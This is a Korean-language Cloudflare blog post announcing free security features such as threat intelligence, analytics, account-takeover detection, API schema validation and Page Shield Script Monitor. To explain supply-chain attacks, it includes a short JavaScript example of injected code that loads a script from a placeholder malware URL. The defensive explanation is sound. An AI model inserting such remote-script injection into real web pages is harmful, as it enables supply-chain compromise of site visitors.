구독해서 새 게시물에 대한 알림을 받으세요.

Cloudflare와 함께하는 더욱 안전한 인터넷: 무료 위협 인텔리전스, 분석 및 새로운 위협 감지

2024-09-24

10분 읽기
이 게시물은 English, 繁體中文, Français, Deutsch, 日本語, Español简体中文로도 이용할 수 있습니다.

인터넷을 사용하는 사람은 누구나 Cloudflare로 보호되는 사이트에 액세스하거나, Cloudflare의 1.1.1.1 확인자를 사용하거나, Cloudflare One 제품을 사용하여 네트워크를 통해 연결함으로써 매일 Cloudflare의 네트워크에 접촉할 가능성이 높습니다.

따라서 Cloudflare는 전 세계 수십억 사용자의 인터넷을 더 안전하게 만들어야 할 막중한 책임을 맡고 있습니다. Cloudflare는 현재 위협 인텔리전스와 10가지 이상의 새로운 보안 기능을 모든 고객에게 무료로 제공하고 있습니다. 웹 사이트, 홈 네트워크, 사무실을 보호하기 위해 Cloudflare를 사용 중이시라면 몇 번의 클릭만으로 사용할 수 있는 유용한 기능을 찾을 수 있습니다.

이 기능은 계정 탈취 공격, 공급망 공격, API 엔드포인트 공격, 네트워크 가시성, 네트워크로부터의 데이터 유출 등 사이버 보안에서 점점 더 커지는 우려 사항을 중심으로 합니다.

모두를 위한 더 강력한 보안

아래 섹션에서 이러한 각 기능에 대해 자세히 알아볼 수 있지만, 먼저 간단한 요약을 제공하고자 합니다.

사이버 보안에 관심이 있으시다면, 새로운 Cloudforce One 위협 인텔리전스 웹 사이트에서 위협 행위자, 공격 캠페인, 기타 인터넷 전반의 보안 문제에 대해 알아보시기 바랍니다.

웹 사이트 소유자인 경우: 오늘부터 모든 Free 요금제에서 해당 영역의 보안 분석에 액세스할 수 있습니다. 또한 GraphQL을 통해 누구나 DNS Analytics를 사용할 수 있도록 할 예정입니다.

가시성을 확보하면 이제 악의적 트래픽과 선의 트래픽을 구분할 수 있습니다. 모든 고객은 상시 계정 탈취 공격 감지, API 엔드포인트에서 능동적 보안 모델을 시행하기 위한 API 스키마 유효성 검사, Page Shield 스크립트 모니터를 통해 사용자 측에서 로드하고 있으며 공급망 기반 공격을 수행하는 데 사용될 수 있는 서드파티 자산에 대한 가시성을 제공합니다.

직원과 네트워크를 보호하기 위해 Cloudflare를 사용하는 경우: 다수의 Cloudflare One 제품을 새로운 무료 제품으로 번들할 예정입니다. 이 번들에는 현재 무료로 제공하는 Zero Trust 제품과 더불어 네트워크 가시성을 제공하는 Magic Network Monitoring, 중요한 데이터를 위한 Data Loss Prevention, 네트워크 연결 및 성능을 측정하는 Digital Experience Monitoring 등의 새로운 제품이 포함됩니다. Cloudflare는 이러한 유형의 제품의 무료 버전을 제공하는 유일한 벤더입니다.

신규 사용자인 경우: 새로운 인증 옵션이 제공됩니다. 오늘부터 일부 고객이 더 쉽게 로그인하고 비밀번호 기억에 대한 의존도를 줄여 결과적으로 Cloudflare 계정이 손상될 위험을 줄일 수 있도록 Google 인증을 사용하여 Cloudflare에 가입하고 로그인할 수 있는 옵션을 도입합니다.

이제 더 자세히 설명하겠습니다.

위협 인텔리전스 및 분석

Cloudforce One

Cloudflare 위협 연구 및 운영 팀인 Cloudforce One과 함께 무료로 액세스할 수 있는 위협 인텔리전스 전용 웹 사이트의 출시를 기쁜 마음으로 발표합니다. 이 사이트를 이용해 최신 위협 행위자의 활동 및 전술에 대한 기술 정보와 경영진 중심의 정보는 물론 새롭게 부상하는 맬웨어, 취약성 및 공격에 대한 인사이트를 게시할 예정입니다.

또한 두 가지 새로운 위협 인텔리전스와 더불어 더 많은 정보를 게시할 것을 약속 드립니다. 새로운 웹 사이트를 방문하여 남아시아 및 동아시아 지역 조직을 노리는 국가와 연계된 공격자의 지속적 활동과 이중 중개 화물 사기의 증가 추세를 다루는 최신 연구를 확인해보세요. 

구독하여 향후 위협 연구에 대한 이메일 알림을 받아보세요.

보안 분석

보안 분석은 완화된 요청뿐만 아니라 모든 HTTP 트래픽에 대한 보안 관점을 제공하여 가장 중요한 트래픽, 즉 악의적인 것으로 간주되지만 잠재적으로 완화되지 않은 트래픽에 집중할 수 있도록 합니다. 이는 보안 이벤트를 사용하여 애플리케이션 보안 제품군이 수행한 보안 작업을 확인하는 것 외에도 보안 분석을 사용하여 모든 트래픽에 이상이나 비정상적인 행동이 있는지 검토한 다음, 확보한 인사이트를 사용하여 특정 트래픽 패턴에 기반하여 정확한 완화 규칙을 만들 수 있다는 의미입니다. 오늘부터 모든 요금제를 사용하는 고객이 이 관점을 이용할 수 있습니다. 

Free 및 Pro 요금제 사용자는 이제 트래픽 분석 차트에서 트래픽에 대한 높은 수준의 개요를 볼 수 있는 보안 분석용 새로운 대시보드에 액세스할 수 있으며, 그룹화 및 필터링 기능을 통해 이상 징후를 쉽게 파악할 수 있습니다. 또한 국가, 소스 브라우저, 소스 운영 체제, HTTP 버전, SSL 프로토콜 버전, 캐시 상태, 보안 조치 등 다양한 차원에서 상위 통계를 확인하고 필터링할 수 있습니다. 

DNS Analytics

이제 Cloudflare의 모든 사용자는 새롭게 개선된 DNS 분석 대시보드에 액세스할 수 있을 뿐만 아니라 강력한 GraphQL API의 새로운 DNS 분석 데이터 세트에 액세스할 수 있습니다. 이제 도메인에 대한 DNS 쿼리를 쉽게 분석하여 문제를 해결하고 패턴과 추세를 감지하거나 강력한 필터를 적용하고 소스별로 DNS 쿼리를 분류하여 사용량 보고서를 생성하는 데 유용하게 사용할 수 있습니다.

Cloudflare는 Foundation DNS를 출시하면서 GraphQL을 기반으로 하는 새로운 DNS 분석을 도입했지만, 이전에는 고급 네임서버를 사용하는 영역에서만 이러한 분석을 사용할 수 있었습니다. 하지만 Cloudflare는 이러한 분석이 제공하는 심층적인 인사이트를 고려하여 이 기능을 모든 사용자에게 제공해야 한다고 생각했습니다. 오늘부터 DNS 섹션의 Analytics에서 Cloudflare의 권한 있는 DNS 서비스를 사용하는 모든 영역은 GraphQL 기반의 새로운 DNS Analytics에 액세스할 수 있습니다.

애플리케이션 위협 감지 및 완화

계정 탈취 감지

인터넷 사용자의 65%가 비밀번호 재사용과 대규모 데이터 유출 빈도 증가로 인한 ATO(계정 탈취)에 취약합니다. 더 나은 인터넷을 구축하려면 중요한 계정 보호 기능을 누구나 쉽고 간편하게 이용할 수 있도록 해야 합니다.

오늘부터 Cloudflare는 자격 증명 스터핑 및 기타 ATO 공격을 방지하는 강력한 계정 보안을 개인 사용자부터 대기업에 이르기까지 모두에게 무료로 제공하며, 유출된 자격 증명 검사 및 ATO 감지 등의 고급 기능도 무료로 제공합니다. 

이러한 업데이트에는 로그인 자동 감지, 최소한의 설정을 통한 무차별 대입 공격 방지 및 자사 데이터베이스 외에 Have I been Pwned(HIBP) 서비스에서 유출된 비밀번호를 비롯하여 150억 개 이상의 비밀번호로 구성된 포괄적으로 유출된 자격 증명 데이터베이스에 대한 액세스가 포함됩니다. 고객은 레이트 리미팅 규칙사용자 지정 규칙과 같은 Cloudflare의 WAF 기능을 통해 유출된 자격 증명 요청에 대해 조치를 취하거나, 원점에 전송된 헤더를 기반으로 MFA(멀티 팩터 인증)을 적용하거나 비밀번호 재설정을 요구하는 등 원점에서 조치를 취할 수 있습니다.

설정은 간단합니다. Free 요금제 사용자는 자동 감지를 사용할 수 있으며, 유료 사용자는 Cloudflare 대시보드에서 클릭 한 번으로 새로운 기능을 활성화할 수 있습니다. 설정 및 구성에 대한 자세한 내용은 문서를 참조하여 지금 바로 사용하세요!

API 스키마 유효성 검사

API 트래픽은 Cloudflare 네트워크 동적 트래픽의 절반 이상을 차지합니다. API의 인기로 인해 완전히 새로운 일련공격 벡터가 등장했습니다. Cloudflare API Shield의 스키마 유효성 검사는 이러한 새로운 위협에 맞서 API 보안을 강화하기 위한 첫 번째 단계입니다. 

이제 처음으로 모든 Cloudflare 고객이 스키마 유효성 검사를 사용하여 API에 대해 유효한 요청만 원점에 전달되도록 할 수 있습니다.

이 기능은 버그로 인한 우발적인 정보 공개를 방지하고, 개발자가 비표준 프로세스를 통해 엔드포인트를 무심코 노출하지 않도록 하며, CI/CD 프로세스의 일부로 API 인벤토리를 최신 상태로 유지하여 좀비 API를 자동으로 차단합니다.

구축 후 CI/CD 프로세스의 일부로 코드가 릴리즈되면 Cloudflare의 API 또는 Terraform 공급자를 사용하여 Cloudflare API Shield에 엔드포인트를 추가하고 스키마를 업데이트하는 것이 좋습니다. 이렇게 하면 API Shield가 API 인벤토리 도구가 되고 스키마 유효성 검사가 예상치 못한 API에 대한 요청을 처리합니다.

API는 타사와의 통합을 위한 것이지만, 때로는 애플리케이션에 직접 라이브러리를 로드하여 통합을 수행하는 경우도 있습니다. 다음으로, 페이지의 입력에서 민감한 정보를 훔치는 악의적인 타사 스크립트로부터 사용자를 보호하여 더 많은 웹을 보호할 수 있도록 지원합니다.

공급망 공격 방지

최신 웹 애플리케이션은 타사 JavaScript 라이브러리를 사용하여 사용자 경험을 개선하고 개발자 시간을 단축합니다. 페이지의 모든 항목에 대한 접근 권한이 있기 때문에, 손상된 타사 JavaScript 라이브러리는 최종 사용자나 사이트 관리자가 인지하지 못한 채 민감한 정보를 공격자에게 몰래 유출할 수 있습니다. Cloudflare는 이러한 위협에 대응하기 위해 Page Shield를 3년 전에 도입했습니다. 이제 Cloudflare는 모든 사용자에게 Page Shield의 Script Monitor를 무료로 제공합니다.

스크립트 모니터를 사용하면 개발자가 포함시킨 것뿐만 아니라 페이지에 로드된 모든 JavaScript 자산을 볼 수 있습니다. 이러한 가시성에는 다른 스크립트에 의해 동적으로 로드된 스크립트도 포함됩니다! 공격자가 라이브러리를 손상시키면 포함되어 있는 기존의 JavaScript 자산에 새로운 코드를 포함함으로써 원본 HTML의 컨텍스트를 변경하지 않고도 새로운 악의적 스크립트를 쉽게 추가할 수 있습니다.

// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);

pollyfill.io 라이브러리의 소유권 변경 소식이 알려졌을 때 스크립트 모니터는 필수가 되었습니다. 스크립트 모니터 사용자는 사이트에 로드된 스크립트를 즉시 확인할 수 있었고 스크립트가 위험에 처했는지 쉽고 빠르게 파악할 수 있었습니다.

Cloudflare는 모든 고객을 위해 스크립트 모니터를 출시함으로써 가능한 한 많은 웹에서 이러한 스크립트의 가시성을 확장하게 되어 기쁘게 생각합니다.문서에서 시작하는 방법을 알아보세요.

기존 Page Shield 사용자는 모니터링된 데이터를 즉시 필터링하여 앱에서 polyfill.io(또는 다른 라이브러리)가 사용되는지 여부를 알 수 있습니다. 또한 2024년 6월에 Free 요금제에서 자동으로 활성화된 손상된 서비스에 대응하여 polyfill.io 재작성 기능을 구축했습니다.

Google Firebase 확장 프로그램으로서의 Turnstile 

Cloudflare는 수동 설정이 필요 없는 원활한 통합을 제공하는 Google Firebase용 Cloudflare Turnstile App Check Provider를 발표하게 되어 기쁩니다. 이 새로운 확장 기능을 통해 Firebase에서 모바일 또는 웹 애플리케이션을 구축하는 개발자는 Cloudflare의 캡차 대안을 사용하여 봇으로부터 프로젝트를 보호할 수 있습니다. Turnstile의 봇 탐지 및 인증 질문 기능을 활용하면 실제 사람인 방문자만 Firebase 백엔드 서비스와 상호 작용하도록 하여 보안과 사용자 경험을 모두 향상시킬 수 있습니다. 개인정보 보호에 중점을 둔 캡차 대안인 Cloudflare Turnstile은 사용자 경험을 방해하지 않으면서 사람과 봇을 구분합니다. 사용자가 종종 포기하는 기존 캡차 솔루션과 달리, Turnstile은 보이지 않게 작동하며 마찰 없는 사용자 상호 작용을 보장하기 위해 다양한 모드를 제공합니다.

Turnstile용 Firebase App Check 확장 프로그램은 통합이 용이하므로 개발자는 최소한의 설정으로 애플리케이션 보안을 빠르게 강화할 수 있습니다. 이 확장 프로그램도 Turnstile의 무료 등급에서 무제한으로 무료 사용할 수 있습니다. 개발자는 Google Firebase의 백엔드 서비스와 Cloudflare Turnstile의 강점을 결합하여 사용자에게 안전하고 원활한 경험을 제공할 수 있습니다.

Cloudflare One

Cloudflare One은 인터넷에서 사람, 애플리케이션, 장치, 네트워크를 보호하고 연결하도록 설계된 포괄적인 SASE(보안 액세스 서비스 에지) 플랫폼입니다. 이 플랫폼은 ZTNA(Zero Trust 네트워크 액세스), SWG(보안 웹 게이트웨이) 등의 서비스를 단일 솔루션으로 결합합니다. Cloudflare One은 모든 사용자가 사람과 네트워크를 보호하고, 접근 제어를 관리하고, 사이버 위협으로부터 데이터를 보호하고, Cloudflare의 전역 네트워크를 통해 네트워크 트래픽을 라우팅하여 성능을 개선할 수 있도록 도와줍니다. 기업 리소스에 대한 액세스를 보호하고 간소화하는 클라우드 기반 접근 방식을 제공함으로써 기존의 보안 조치를 대체합니다.

지난 2년 동안 Cloudflare One에 추가된 다음 4가지 신제품을 이제 누구나 무료로 이용할 수 있습니다.

이는 이미 Cloudflare One 플랫폼에 제공되는 기존 네트워크 보안 제품에 추가됩니다.

  • Access: 사용자 ID를 확인하고 원래 사용했던 애플리케이션만 사용할 수 있게 합니다.

  • Gateway: 공용 인터넷 및 비공개 네트워크로 향하는 네트워크 트래픽을 보호합니다.

  • Cloudflare Tunnel: 다양한 애플리케이션, 서버, 비공개 네트워크를 Cloudflare의 네트워크에 연결하기 위한 Cloudflare와 WARP Connector를 모두 포함하는 Cloudflare의 애플리케이션 커넥터입니다.

  • Cloudflare WARP: 장치 에이전트로, 노트북이나 모바일 장치에서 인터넷으로 안전하게 트래픽을 전송할 수 있습니다.

Cloudflare 계정이 있는 사용자는 Cloudflare One 조직의 모든 제품에 대한 50개의 무료 시트를 자동으로 받게 됩니다.Zero Trust 및 SASE 요금제 페이지를 방문하여 무료 제품에 대한 자세한 정보와 50명 이상의 구성원을 위한 종량제 및 계약 요금제에 대해 알아보세요.

Google로 인증하기

Cloudflare 대시보드 자체는 그 자체로 보호해야 할 중요한 리소스가 되었으며, Cloudflare는 사용자 계정이 손상되지 않도록 하기 위해 많은 시간을 할애하고 있습니다.

이를 위해 애플리케이션 기반 2FA(2단계 인증), 암호 키, SSO, Apple로 로그인 등 인증 방식을 추가하여 보안을 강화했습니다. 오늘 Google 계정으로 등록하고 로그인하는 기능을 추가할 예정입니다. 

Cloudflare는 다양한 사용 사례에 맞춘 여러 인증 워크플로를 지원합니다. SSO와 암호 키는 가장 선호되는 인증 방법이자 안전한 방법이지만, 암호보다 강력한 인증 요소를 제공하면 사용자에 대한 격차를 메우고 전반적인 평균 보안을 높일 수 있다고 생각합니다. Google로 로그인하면 사용자가 더 편리하게 사용할 수 있으며, 이미 Google 아이디로 웹을 탐색하고 있는 상황에서 또 다른 비밀번호를 기억하지 않아도 됩니다.

Google로 로그인은 OAuth 2.0 사양을 기반으로 하며, 특정 ID에 대한 식별 정보를 안전하게 공유하면서 이 정보를 제공하는 주체가 Google임을 확인하여 악의적인 주체가 Google을 가장하는 것을 방지할 수 있습니다.

즉, Google에 인증을 위임하여 이 Cloudflare ID에 대한 제로 지식 공격을 직접적으로 방지할 수 있습니다.

Cloudflare 로그인 페이지로 이동하면 아래 버튼이 표시됩니다. 클릭하면 Cloudflare에 등록할 수 있으며, 등록하면 Google 계정에 설정해 두었던 기존 보호 기능을 사용하여 비밀번호를 입력하지 않고 로그인할 수 있습니다.

이 기능의 출시와 함께, Cloudflare는 이제 자체 Cloudflare Workers를 사용하여 OIDC 호환 ID 공급자(예: GitHub 및 Microsoft 계정)를 위한 추상 계층을 제공하므로 사용자는 앞으로 더 많은 IdP(ID 공급자) 연결 지원을 기대할 수 있게 됩니다.

현재는 Google에 새로 가입하는 고객만 Google 계정으로 로그인할 수 있지만, Cloudflare는 향후 더 많은 사용자를 위해 소셜 로그인 제공자를 연결/연결 해제할 수 있는 기능을 구현하고 소셜 로그인 방법을 추가할 예정입니다. 현재 SSO가 설정된 Enterprise 사용자는 이 방법을 사용할 수 없으며, Cloudflare 환경을 차단하기 위해 설정된 Access 및 IdP 정책을 간소화하는 방법을 고려하는 동안 Google Workspace를 기반으로 SSO가 설정된 사용자는 해당 SSO 플로우로 전달될 것입니다.

Cloudflare를 처음 사용하고 Google 계정이 있는 경우, Cloudflare를 사용하여 웹 사이트를 보호하거나, 새로운 서비스를 구축하거나, Cloudflare가 제공하는 다른 서비스를 사용해보는 것이 그 어느 때보다 쉬워졌습니다.

더 안전한 인터넷

Cloudflare의 목표 중 하나는 항상 사이버 보안 도구를 대중화하여 누구나 대규모 엔터프라이즈 조직의 리소스 없이도 콘텐츠를 제공하고 인터넷에 안전하게 연결할 수 있도록 하는 것이었습니다.

저희는 웹 관리자, 네트워크 관리자, 사이버 보안에 관심 있는 분들을 위해 광범위한 보안 사용 사례를 포괄하는 새로운 기능을 모든 Cloudflare 사용자에게 무료로 제공하기로 결정했습니다.

지금 바로 Cloudflare 계정에 로그인하여 이 발표 사항을 활용하세요. 저희는 커뮤니티 포럼에 대한 피드백을 환영하며, 앞으로 기존 기능과 새로운 기능을 모두 개선하기 위해 최선을 다하고 있습니다.

Cloudflare TV에서 보기

Cloudflare에서는 전체 기업 네트워크를 보호하고, 고객이 인터넷 규모의 애플리케이션을 효과적으로 구축하도록 지원하며, 웹 사이트와 인터넷 애플리케이션을 가속화하고, DDoS 공격을 막으며, 해커를 막고, Zero Trust로 향하는 고객의 여정을 지원합니다.

어떤 장치로든 1.1.1.1에 방문해 인터넷을 더 빠르고 안전하게 만들어 주는 Cloudflare의 무료 앱을 사용해 보세요.

더 나은 인터넷을 만들기 위한 Cloudflare의 사명을 자세히 알아보려면 여기에서 시작하세요. 새로운 커리어 경로를 찾고 있다면 채용 공고를 확인해 보세요.
Birthday Week (KO)보안CASB (KO)DLPData Loss PreventionThreat IntelligenceZero TrustCloudflare OnePage ShieldLeaked Credential ChecksSASE

X에서 팔로우하기

Michael Tremante|@MichaelTremante
Reid Tatoris|@reidtatoris
Cloudflare|@cloudflare

관련 게시물

2024년 10월 23일 오후 1:00

Fearless SSH: short-lived certificates bring Zero Trust to infrastructure

Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration. ...